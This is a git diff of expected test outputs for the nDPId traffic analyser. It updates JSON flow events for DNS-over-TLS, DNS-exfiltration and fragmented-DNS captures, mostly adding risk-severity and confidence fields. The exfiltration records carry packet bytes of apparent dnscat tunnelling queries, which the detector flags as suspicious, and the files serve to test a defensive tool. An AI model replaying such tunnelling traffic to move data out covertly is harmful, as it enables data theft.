{"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}}
-00780{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01636{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}}
+01049{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 24/24
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4601782 bytes
-~~ total memory freed........: 4601782 bytes
-~~ total allocations/frees...: 99592/99592
+~~ total memory allocated....: 4686735 bytes
+~~ total memory freed........: 4686735 bytes
+~~ total allocations/frees...: 101182/101182
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 1372 chars
-~~ json string avg len.......: 796 chars
+~~ json string max len.......: 1641 chars
+~~ json string avg len.......: 921 chars
diff --git a/test/results/dns_exfiltration.pcap.out b/test/results/dns_exfiltration.pcap.out
index 66c7a1616..1a0dae3b7 100644
--- a/test/results/dns_exfiltration.pcap.out
+++ b/test/results/dns_exfiltration.pcap.out
@@ -1,11 +1,11 @@
 00448{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_exfiltration.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":180000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1580978146717,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1580978146717,"pkt":"qqru7hERjNzURr7ECABFAADJegRAAD8RAADAqNw4wKjLp9w1ADUAtSn4OR0BAAABAAAAAAAABmRuc2NhdDw1NDZiMDNmNTAwMDAwMDAwMDBhNjAyM2VkNGRmMTg0ZDZhYzVjMjYyOGI0NzcxNGZkZWU1ODRmZWQ3Mzk8NWEwM2I1YjFlMWFhOGY4ZmRiMWJiZThkNWUwNDk1MjE0MWY3ZDRmODJjN2UzYjA2ZGNjOGI4N2ZhZDdhGjE5ZTRkMDk4ZGM4YzYxOGY4ZDgxY2ZlYjAyAAAPAAE="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":180000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1580978146717,"flow_last_seen":1580978146717,"flow_idle_time":180000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1580978146717,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00897{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1580978146888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1580978146888,"pkt":"jNzURr7Eqqru7hERCABFAAF0PC1AAD8R1RrAqMunwKjcOAA13DUBYD3xOR2BgAABAAEAAAAABmRuc2NhdDw1NDZiMDNmNTAwMDAwMDAwMDBhNjAyM2VkNGRmMTg0ZDZhYzVjMjYyOGI0NzcxNGZkZWU1ODRmZWQ3Mzk8NWEwM2I1YjFlMWFhOGY4ZmRiMWJiZThkNWUwNDk1MjE0MWY3ZDRmODJjN2UzYjA2ZGNjOGI4N2ZhZDdhGjE5ZTRkMDk4ZGM4YzYxOGY4ZDgxY2ZlYjAyAAAPAAHADAAPAAEAAAA8AJ8ACgZkbnNjYXQ\/MjAxZjAzZjUwMDAwMDAwMDAwNzEzYjkyNzFmMDExZGM3NjQyM2RhYjM5MmMzMmMxOGJmYzk2YjZkMjY5NWEyPzZhOTExYzk0NDcyZjU5NDA5YTVmNTI2MDEzZTc2MDE5MzY2YTA3NzkyOWUzNDgwZmJlNmQ3YzRlZGE2ZjkwOBRmMmJjOTlhNjAxZTFhODIyMTMzNgA="}
-00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1580978146717,"flow_last_seen":1580978146888,"flow_idle_time":180000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1580978146888,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}}
+00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1580978146717,"flow_last_seen":1580978146888,"flow_idle_time":180000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1580978146888,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1580978147753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1580978147753,"pkt":"qqru7hERjNzURr7ECABFAACYekZAAD8RAADAqNw4wKjLp9w1ADUAhCnHfRoBAAABAAAAAAAABmRuc2NhdDw5MWYwMDNmNTAwZjYxMjIxODEwYWVhMDAwMDA0ODYzYzY5MTU4MGVjYWQ2NmY2NGFjN2RkYjg3Yjg5YzcmOTIwMDgyMWU1MjdkNGUxNzYzMjUzYzI1ZTI5N2UyYWE0MTEzZDAAAAUAAQ=="}
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":300,"flow_first_seen":1580978146717,"flow_last_seen":1580978206707,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":60945,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1580978206707,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":300,"flow_first_seen":1580978146717,"flow_last_seen":1580978206707,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":60945,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1580978206707,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 300/300
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603529 bytes
-~~ total memory freed........: 4603529 bytes
-~~ total allocations/frees...: 99853/99853
+~~ total memory allocated....: 4688482 bytes
+~~ total memory freed........: 4688482 bytes
+~~ total allocations/frees...: 101443/101443
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 902 chars
-~~ json string avg len.......: 602 chars
+~~ json string max len.......: 986 chars
+~~ json string avg len.......: 644 chars
diff --git a/test/results/dns_fragmented.pcap.out b/test/results/dns_fragmented.pcap.out
index 5656fa6fb..e12f9bc44 100644
--- a/test/results/dns_fragmented.pcap.out
+++ b/test/results/dns_fragmented.pcap.out
@@ -1,147 +1,147 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_fragmented.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1558968008021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1558968008021,"pkt":"AAwpil3XAIac51UUCABFAABE5WoAAG8R7BGs2ShMwRjj7t1oADUAMAwz1D8AEAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAAAA=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1558968008021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAXc0P4gAEARCebBGOPurNkoTAA13WgGrrRj1D+EEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwAMAABAAAAPAEIAQADCgMBAAHQVNwo8VCsO0nmM2u3Mcqv14N851ULDM7hf1Hi2ooDrm7SR4cYS\/ptdvSMUJEyqPCUSF3Clw\/mlYs7YppfPvATwlxTT37RaXRQswUTRh4\/3GtYPxZXJOr+Wr2nwf4Rqm1imNixBim+ZLWFho\/CQdJqyhqg2VT8ongtHWFb9Nojmjr1IXZe0LYFcm0d1eoB5YaBtAcRvhm41KfjcjwpW7jDiMH5W1RgefeOj8kBkIJxjV9i9TB7pjmmAvw91J8s0GTTJqo\/ORsAzT8BHg3y6usJtQVH8ezMMHBFbjtgdGJlMoj4kn1KBk8Jtj9ZxjTIZWIo922PVb8sQqj0JytLOU69wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
 00638{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAD60P4AuUARLg\/BGOPurNkoTJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"}
 00192{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
